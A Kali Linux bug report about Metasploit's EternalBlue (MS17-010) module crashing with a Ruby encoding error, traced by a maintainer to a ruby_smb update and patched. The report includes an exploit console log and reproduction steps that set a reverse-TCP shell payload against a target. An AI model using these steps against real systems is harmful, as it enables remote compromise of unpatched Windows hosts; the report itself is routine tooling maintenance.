View Issue Details

ID: 0007672
Project: Kali Linux
Category: Kali Package Bug
View Status: public
Last Update: 2022-04-18 19:55
Reporter: 4oo4
Assigned To: daniruiz
Priority: normal
Severity: minor
Reproducibility: always
Status: resolved
Resolution: fixed
Product Version: 2022.1
Fixed in Version: 2022.2
Summary0007672: Metasploit 6.1.37 - ms17_010_eternalblue module - Encoding::UndefinedConversionError
Description

Metasploit's EternalBlue module crashes with Encoding::UndefinedConversionError when attempting to make an SMB connection:

msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 10.9.0.13:4444
[*] 10.10.17.29:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.17.29:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.17.29:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.17.29:445 - The target is vulnerable.
[*] 10.10.17.29:445 - Connecting to target for exploitation.
[+] 10.10.17.29:445 - Connection established for exploitation.
[+] 10.10.17.29:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.17.29:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.17.29:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.17.29:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.17.29:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.17.29:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.17.29:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.17.29:445 - Sending all but last fragment of exploit packet
[*] 10.10.17.29:445 - Starting non-paged pool grooming
[-] 10.10.17.29:445 - Encoding::UndefinedConversionError
[-] 10.10.17.29:445 - "\xF0" to UTF-8 in conversion from ASCII-8BIT to UTF-8 to UTF-16LE
[-] 10.10.17.29:445 - /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/ruby_smb-3.1.0/lib/ruby_smb/field/stringz16.rb:6:in `encode'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/ruby_smb-3.1.0/lib/ruby_smb/field/stringz16.rb:6:in `assign'
(eval):2:in `assign'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/bindata-2.4.10/lib/bindata/struct.rb:190:in `block in define_field_accessors_for'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:1574:in `make_smb1_free_hole_session_packet'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:1380:in `smb1_free_hole'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:1221:in `smb_eternalblue'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:1132:in `block in exploit_eb'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/activesupport-6.1.5/lib/active_support/core_ext/range/each.rb:9:in `each'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/activesupport-6.1.5/lib/active_support/core_ext/range/each.rb:9:in `each'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:1130:in `exploit_eb'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:315:in `exploit'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:228:in `job_run_proc'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:181:in `run'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:144:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:171:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:45:in `exploit_single'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:182:in `cmd_exploit'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:581:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:530:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:162:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:23:in `<main>'
[*] Exploit completed, but no session was created.

Steps To Reproduce
  • Run Metasploit
  • msf6 > use exploit/windows/smb/ms17_010_eternalblue
  • msf6 > set payload windows/x64/shell/reverse_tcp
  • msf6 > set RHOSTS 1.2.3.4
  • msf6 > set LHOST 1.2.3.5
  • msf6 > exploit

Additional Information

Version 6.1.39-dev of Metasploit from the Rapid7 repo does not have this issue.
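As an added illustration (not part of the report, of Metasploit or of ruby_smb), the Ruby String#encode behaviour behind the error in the trace: a string tagged ASCII-8BIT that holds a byte above 0x7F cannot be transcoded to UTF-16LE, because Ruby routes the conversion through UTF-8. The sample buffers are constructed, and the two recovery functions show generic Ruby handling of binary data, not the upstream fix.

```ruby
# Added example: the String#encode failure from the trace, reproduced outside
# Metasploit. The buffers below are constructed, not taken from the module.

# Arbitrary bytes tagged ASCII-8BIT (Ruby's BINARY); 0xF0 has bit 7 set.
BINARY_BUF = "Win\xF0".b
# The same text as it would sit in a UTF-16LE wire field.
WIRE_UTF16 = "W\x00i\x00n\x00\xF0\x00".b

# What fails: Ruby has no direct ASCII-8BIT -> UTF-16LE transcoder, so it
# goes ASCII-8BIT -> UTF-8 -> UTF-16LE, and a lone 0xF0 is not valid UTF-8.
# Pure-ASCII input survives this path, which is why the bug is data-dependent.
def encode_via_utf8(bytes)
  bytes.encode('UTF-16LE')
rescue Encoding::UndefinedConversionError => e
  [:error, e.message]
end

# Recovery 1: the bytes are already UTF-16LE on the wire, so only the
# encoding tag is wrong; relabel them without transcoding.
def relabel_as_utf16le(bytes)
  bytes.dup.force_encoding('UTF-16LE')
end

# Recovery 2: widen arbitrary bytes losslessly. ISO-8859-1 maps 0x00..0xFF
# one-to-one onto U+0000..U+00FF, so every byte becomes one UTF-16 code unit.
def bytes_to_utf16le(bytes)
  bytes.dup.force_encoding('ISO-8859-1').encode('UTF-16LE')
end

if __FILE__ == $PROGRAM_NAME
  p encode_via_utf8(BINARY_BUF)                     # [:error, "...to UTF-16LE"]
  p relabel_as_utf16le(WIRE_UTF16).encode('UTF-8')  # "Winð"
  p bytes_to_utf16le(BINARY_BUF) == relabel_as_utf16le(WIRE_UTF16)  # true
end
```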

Activities

daniruiz (manager), 2022-04-18 14:09, note ~0016047

I've tested it with the latest version of metasploit-framework 6.1.38 and the issue is present, but it does work properly in 6.1.37.

daniruiz (manager), 2022-04-18 16:27, note ~0016048

The issue was introduced with the package version 6.1.37-0kali2, that's why it still works with 6.1.37-0kali1, and seems to be caused by a ruby dependency.

daniruiz (manager), 2022-04-18 17:41, note ~0016049

The issue is caused by the update of ruby_smb from 3.0.6 to 3.1.0. Changing the version and building the package again fixes the issue. I'll patch it and file the bug report.

daniruiz (manager), 2022-04-18 18:07, note ~0016050

Bug report: https://github.com/rapid7/metasploit-framework/issues/16468

daniruiz (manager), 2022-04-18 19:54, note ~0016051

There's already a fix in metasploit-framework: https://github.com/rapid7/metasploit-framework/commit/7c8c0b5e05dc6cea1a29461e6564c5ceccd80114
I've patched Kali's package and it will soon be updated in the repositories.

Issue History

Date Modified Username Field Change
2022-04-18 01:46 4oo4 New Issue
2022-04-18 14:09 daniruiz Assigned To => daniruiz
2022-04-18 14:09 daniruiz Status new => confirmed
2022-04-18 14:09 daniruiz Note Added: 0016047
2022-04-18 16:27 daniruiz Note Added: 0016048
2022-04-18 17:41 daniruiz Note Added: 0016049
2022-04-18 18:07 daniruiz Note Added: 0016050
2022-04-18 18:46 daniruiz Assigned To daniruiz =>
2022-04-18 18:46 daniruiz Assigned To => daniruiz
2022-04-18 18:46 daniruiz Status confirmed => assigned
2022-04-18 19:54 daniruiz Note Added: 0016051
2022-04-18 19:55 daniruiz Status assigned => closed
2022-04-18 19:55 daniruiz Resolution open => fixed
2022-04-18 19:55 daniruiz Fixed in Version => 2022.2
2022-04-18 19:55 daniruiz Status closed => resolved